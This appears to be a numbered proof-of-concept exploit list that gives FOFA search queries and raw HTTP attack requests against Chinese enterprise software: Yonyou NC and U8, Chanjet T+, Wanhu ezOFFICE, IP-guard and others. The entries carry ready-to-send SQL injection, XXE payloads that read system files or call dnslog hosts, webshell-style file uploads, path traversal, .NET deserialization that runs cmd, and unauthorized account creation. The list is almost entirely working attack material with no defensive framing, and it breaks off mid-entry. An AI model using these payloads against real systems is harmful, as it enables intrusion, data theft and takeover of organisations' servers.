GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 (Yunshikong) Socialized Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; the command it runs writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then visit:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets its directory, and the fileType parameter sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

